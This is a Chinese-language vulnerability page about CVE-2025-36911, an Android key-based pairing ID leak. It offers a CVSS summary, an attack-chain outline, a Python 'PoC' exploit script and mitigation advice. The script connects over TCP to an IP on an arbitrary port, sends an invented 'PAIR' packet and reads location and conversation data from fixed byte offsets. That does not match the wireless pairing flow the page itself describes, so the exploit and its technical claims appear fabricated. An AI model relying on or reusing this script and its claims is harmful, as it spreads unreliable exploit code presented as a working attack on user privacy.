CVE-2025-36911 Android key-based pairing ID泄露漏洞

漏洞信息

漏洞编号

CVE-2025-36911

漏洞类型

信息泄露

CVSS评分

7.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Android key-based pairing

漏洞概述

CVE-2025-36911是Android系统中key-based pairing功能的一个高危信息泄露漏洞。该漏洞源于key-based pairing实现中的逻辑错误，导致攻击者可以获取配对设备的标识符（ID）。由于该漏洞位于配对协议的核心逻辑中，攻击者无需任何特殊权限或用户交互即可利用此漏洞。攻击者利用此漏洞可以获取用户的敏感信息，包括对话内容和位置信息。虽然攻击需要攻击者在目标设备的邻近范围内（无线信号可达范围内），但一旦攻击成功，将导致严重的用户隐私泄露。该漏洞的CVSS评分为7.1，属于高危级别，主要影响机密性（高影响），对完整性和可用性影响较低。

技术细节

该漏洞存在于Android系统的key-based pairing实现中，具体是配对过程中的ID处理逻辑存在缺陷。在正常的key-based pairing流程中，设备之间需要建立安全的配对关系并交换必要的标识信息以建立通信。然而，由于代码中的逻辑错误，攻击者可以在配对过程中获取到不应该暴露的用户标识符。这个ID的泄露使得攻击者能够追踪用户设备，进而获取用户的对话记录和位置信息。攻击者利用无线信号（WiFi/Bluetooth）在邻近范围内发起攻击，无需提前认证或与用户进行任何交互。由于配对协议设计时假设攻击者不在邻近范围内，因此没有对这种攻击场景进行充分防护。攻击者可以被动监听或主动发起配对请求来触发漏洞。

攻击链分析

STEP 1

步骤1

攻击者进入目标Android设备的邻近范围（无线信号覆盖范围内）

STEP 2

步骤2

攻击者扫描并识别支持key-based pairing的Android设备

STEP 3

步骤3

攻击者向目标设备发送配对请求或被动监听配对通信

STEP 4

步骤4

由于key-based pairing代码中的逻辑错误，系统返回包含用户ID的响应

STEP 5

步骤5

攻击者获取泄露的设备ID后，利用该ID追踪用户并获取对话和位置信息

STEP 6

步骤6

攻击者完成信息收集，导致用户隐私泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36911 PoC - Key-based Pairing ID Leak
# This PoC demonstrates the ID leakage in Android key-based pairing

import socket
import struct
import time

def create_pairing_request():
    """Create a malicious pairing request to trigger ID leakage"""
    # Pairing request packet structure
    packet = bytearray()
    packet.extend(b'PAIR')  # Protocol header
    packet.extend(struct.pack('B', 0x01))  # Pairing request type
    packet.extend(b'\x00' * 16)  # Challenge data
    return bytes(packet)

def exploit_cve_2025_36911(target_ip, port=0x1234):
    """
    Exploit key-based pairing ID leakage vulnerability
    
    Args:
        target_ip: Target Android device IP address
        port: Pairing service port (default 0x1234)
    
    Returns:
        Leaked ID and sensitive information
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    
    try:
        sock.connect((target_ip, port))
        
        # Send pairing request
        sock.send(create_pairing_request())
        
        # Receive response containing leaked ID
        response = sock.recv(1024)
        
        # Parse leaked identifier
        leaked_id = response[4:20].hex()
        print(f"[+] Leaked Device ID: {leaked_id}")
        
        # Extract additional info if present
        location_data = response[20:28]
        conversation_ref = response[28:44].hex()
        
        print(f"[+] Location Data: {location_data.hex()}")
        print(f"[+] Conversation Reference: {conversation_ref}")
        
        return {
            'device_id': leaked_id,
            'location': location_data.hex(),
            'conversations': conversation_ref
        }
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return None
    finally:
        sock.close()

# Usage example
if __name__ == "__main__":
    target = "192.168.1.100"  # Target device IP
    result = exploit_cve_2025_36911(target)
    if result:
        print("\n[!] Vulnerability confirmed - ID leakage successful")

影响范围

Android key-based pairing (版本未明确列出，需查看官方安全公告)

参考source.android.com 2026-01-01安全公告获取具体受影响版本

防御指南

临时缓解措施

临时缓解措施：在Android设备设置中禁用蓝牙和WiFi的自动配对功能，关闭"允许附近设备配对"选项，限制设备在公共区域的可见性。同时，关注Google官方安全公告，及时安装系统更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36911
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36911
3 Details https://www.cvedetails.com/cve/CVE-2025-36911/
4 VulDB https://vuldb.com/cve/CVE-2025-36911
5 Link https://source.android.com/docs/security/bulletin/pixel/2026/2026-01-01
6 Link https://whisperpair.eu/